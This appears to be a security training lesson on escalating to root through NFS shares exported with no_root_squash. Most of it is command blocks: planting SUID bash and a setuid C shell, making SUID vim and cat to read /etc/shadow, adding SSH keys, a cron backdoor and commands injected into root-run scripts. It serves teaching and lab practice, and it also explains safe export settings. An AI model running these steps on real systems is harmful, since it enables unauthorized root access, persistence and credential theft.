NFS Privilege Escalation

intermediate25 minWriteup

Exploiting NFS misconfigurations

Learning Objectives

  • Enumerate NFS shares
  • Exploit no_root_squash
  • Create SUID files via NFS
  • Mount NFS shares

NFS (Network File System) shares can be a goldmine for privilege escalation. When NFS is misconfigured with "no_root_squash", you can create SUID binaries as root from your attack machine that execute on the target. It's like leaving a master key maker unguarded.

Think of NFS like a shared folder between computers. Normally, even if you mount it as root, the server "squashes" your root privileges (root_squash). But with no_root_squash, root on your machine = root on the share. Create a SUID binary, and boom - root on the target.

Requires Network Access

NFS exploitation requires network access to the target. You typically need a shell on the system to discover NFS misconfigurations, then use your attack machine to exploit them.

Enumerating NFS

bash
1606070;"># On target: Check for NFS exports
2cat /etc/exports
3606070;"># Example output:
4606070;"># /home/backup *(rw,sync,no_root_squash)
5606070;"># /var/shared 192.168.1.0/24(rw,sync)
6606070;"># /opt/files *(rw,no_root_squash,insecure)
7 
8606070;"># Look for no_root_squash - that's the vulnerability!
9 
10606070;"># Show mounted NFS shares
11showmount -e localhost
12showmount -e 127.0.0.1
13 
14606070;"># Check mount points
15mount | grep nfs
16cat /proc/mounts | grep nfs
17 
18606070;"># From attack machine: Enumerate NFS
19showmount -e TARGET_IP
20606070;"># Export list:
21606070;"># /home/backup *
22606070;"># /opt/files   *
23 
24606070;"># Check NFS service
25rpcinfo -p TARGET_IP | grep nfs
26606070;"># 100003  3   tcp   2049  nfs
27606070;"># 100003  4   tcp   2049  nfs

Understanding NFS Options

1NFS Export Options:
2├── rw              - Read/write access
3├── ro              - Read-only access
4├── sync            - Sync writes immediately
5├── async           - Buffer writes (faster, less safe)
6├── root_squash     - Map root to nobody (DEFAULT - safe)
7├── no_root_squash  - Root stays root (DANGEROUS!)
8├── all_squash      - Map all users to nobody
9├── no_all_squash   - Keep user mappings (default)
10├── insecure        - Allow connections from ports > 1024
11└── secure          - Require ports < 1024 (default)
12 
13Dangerous Combinations:
14├── rw + no_root_squash = Create SUID files as root
15├── rw + insecure = Easier to connect from attack machine
16└── rw + * (any host) = Anyone can mount
17 
18Safe Configurations:
19├── ro = Can't write anything
20├── root_squash = Root becomes nobody
21└── Specific IP restrictions

Exploiting no_root_squash

bash
1606070;"># Scenario: /etc/exports on target:
2606070;"># /home/backup *(rw,sync,no_root_squash)
3 
4606070;"># On attack machine (as root):
5606070;"># 1. Create mount point
6mkdir /tmp/nfs
7mount -t nfs TARGET_IP:/home/backup /tmp/nfs
8 
9606070;"># 2. Verify mount
10df -h | grep nfs
11606070;"># TARGET_IP:/home/backup   10G  5.0G  5.0G  50% /tmp/nfs
12 
13606070;"># 3. Create SUID binary
14606070;"># Method 1: Copy bash and set SUID
15cp /bin/bash /tmp/nfs/rootbash
16chmod +s /tmp/nfs/rootbash
17 
18606070;"># Method 2: Create C program
19cat > /tmp/nfs/shell.c << 606070;">#a5d6ff;">'EOF'
20606070;">#include <stdio.h>
21606070;">#include <stdlib.h>
22606070;">#include <unistd.h>
23 
24int main() {
25    setuid(0);
26    setgid(0);
27    system(606070;">#a5d6ff;">"/bin/bash -p");
28    return 0;
29}
30EOF
31 
32606070;"># Compile as root
33gcc /tmp/nfs/shell.c -o /tmp/nfs/shell
34chmod +s /tmp/nfs/shell
35 
36606070;"># 4. Unmount
37umount /tmp/nfs
38 
39606070;"># 5. On target, execute the SUID binary
40606070;"># Find where the share is mounted
41df -h | grep nfs
42606070;"># Or check: mount | grep nfs
43 
44606070;"># Execute our backdoor
45/home/backup/rootbash -p
46606070;"># Or
47/home/backup/shell
48 
49606070;"># You're root!
50id
51606070;"># uid=0(root) gid=0(root)

Must Be Root on Attacker

To create SUID binaries on NFS with no_root_squash, you must be root on your attack machine. The whole point is that root on your machine = root on the share.

Alternative Exploitation Methods

bash
1606070;"># Method 3: Create SUID for any command
2606070;"># If you need specific functionality:
3 
4606070;"># SUID vim (file editing as root)
5cp /usr/bin/vim /tmp/nfs/suidvim
6chmod +s /tmp/nfs/suidvim
7606070;"># On target: /mount/path/suidvim /etc/shadow
8 
9606070;"># SUID cat (read any file)
10cp /bin/cat /tmp/nfs/suidcat
11chmod +s /tmp/nfs/suidcat
12606070;"># On target: /mount/path/suidcat /etc/shadow
13 
14606070;"># Method 4: Just write files as root
15606070;"># Even without SUID, you can write anywhere on share
16 
17606070;"># Add SSH key to root
18mkdir /tmp/nfs/.ssh 2>/dev/null
19echo 606070;">#a5d6ff;">"YOUR_SSH_PUBLIC_KEY" >> /tmp/nfs/.ssh/authorized_keys
20chmod 700 /tmp/nfs/.ssh
21chmod 600 /tmp/nfs/.ssh/authorized_keys
22 
23606070;"># Write cron job
24echo 606070;">#a5d6ff;">"* * * * * root /tmp/revshell.sh" >> /tmp/nfs/cron.d/backdoor
25 
26606070;"># Method 5: Modify existing scripts
27606070;"># If share contains executable scripts run by root:
28echo 606070;">#a5d6ff;">"cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash" >> /tmp/nfs/scripts/backup.sh

Troubleshooting NFS Mounts

bash
1606070;"># Common mount errors and solutions
2 
3606070;"># Error: mount.nfs: access denied
4606070;"># Cause: IP not in allowed list or permissions
5606070;"># Solution: Check /etc/exports for IP restrictions
6 
7606070;"># Error: mount.nfs: Connection refused
8606070;"># Cause: NFS service not running or firewall
9606070;"># Check: rpcinfo -p TARGET_IP
10606070;"># Ports: 111 (rpcbind), 2049 (nfs)
11 
12606070;"># Error: mount.nfs: Protocol not supported
13606070;"># Cause: NFS version mismatch
14606070;"># Solution: Try specific version
15mount -t nfs -o vers=3 TARGET_IP:/share /tmp/nfs
16mount -t nfs -o vers=4 TARGET_IP:/share /tmp/nfs
17 
18606070;"># Error: mount: wrong fs type...
19606070;"># Cause: Missing NFS client
20606070;"># Solution: Install nfs-common
21apt install nfs-common   606070;"># Debian/Ubuntu
22yum install nfs-utils    606070;"># RHEL/CentOS
23 
24606070;"># Error: Operation not permitted (setting SUID)
25606070;"># Cause: root_squash is enabled (not vulnerable)
26606070;"># Check: cat /etc/exports on target
27 
28606070;"># Verify if SUID works
29ls -la /tmp/nfs/rootbash
30606070;"># Should show: -rwsr-sr-x (the 's' indicates SUID)
31 
32606070;"># If 's' not showing, no_root_squash isn't working
33606070;"># Or the filesystem doesn't support SUID (mount options)

Check Mount Options

Some mounts may be made with "nosuid" option even if the export allows it. Check both /etc/exports AND the actual mount options on the target.

Exploitation Without Root on Attacker

bash
1606070;"># If you don't have root on attack machine:
2 
3606070;"># Method 1: Use SSH forwarding
4606070;"># If you have SSH access to target:
5ssh -L 2049:localhost:2049 user@TARGET
6 
7606070;"># Then mount through tunnel (still needs root for mount)
8 
9606070;"># Method 2: Check for writable content
10606070;"># Even with root_squash, you write as your own user
11606070;"># Mount and look for:
12606070;"># - Writable config files
13606070;"># - Credentials
14606070;"># - SSH keys
15606070;"># - Writable scripts that root runs
16 
17606070;"># Method 3: Use the target itself
18606070;"># If target is NFS client of another vulnerable server:
19606070;"># Pivot from target to attack NFS on other machines
20 
21606070;"># Method 4: Docker/VM
22606070;"># Create root container/VM on attack machine
23docker run --rm -it --privileged -v /tmp/nfs:/mnt alpine
24606070;"># Inside container as root, create SUID binary

Finding Mounted NFS on Target

bash
1606070;"># On target, find where NFS shares are mounted
2 
3606070;"># Method 1: Check mount
4mount | grep nfs
5mount | grep -i 606070;">#a5d6ff;">"type nfs"
6 
7606070;"># Method 2: Check /proc/mounts
8cat /proc/mounts | grep nfs
9 
10606070;"># Method 3: Check df
11df -h -t nfs
12df -h -t nfs4
13 
14606070;"># Method 4: Check fstab for auto-mounts
15cat /etc/fstab | grep nfs
16 
17606070;"># Method 5: findmnt command
18findmnt -t nfs
19findmnt -t nfs4
20 
21606070;"># Example output:
22606070;"># TARGET:/home/backup on /mnt/backup type nfs4 (rw,sync)
23 
24606070;"># The mount point on target is /mnt/backup
25606070;"># That's where your SUID binary will be!

NFS Exploitation Methodology

NFS Privilege Escalation Flow

1
Find Exportscat /etc/exports on target
2
Identify VulnLook for no_root_squash + rw
3
MountMount share as root from attack machine
4
Create SUIDCopy bash or compile SUID binary
5
Set Permissionschmod +s on the binary
6
ExecuteRun SUID binary on target as root

Knowledge Check

Quick Quiz
Question 1 of 3

What does no_root_squash mean in NFS exports?

Challenges

NFS Root Squash Bypass

Challenge
🔥 intermediate

Target exports /home/shared with *(rw,no_root_squash). The share is mounted at /mnt/shared on the target. Create a SUID backdoor and escalate to root.

Need a hint? (4 available)

Key Takeaways

  • Check /etc/exports for no_root_squash + rw shares
  • no_root_squash means root on client = root on share
  • Mount share on attack machine, create SUID binary as root
  • Execute SUID binary on target for root access
  • Must have root on attack machine to exploit
  • Find mount point on target with mount | grep nfs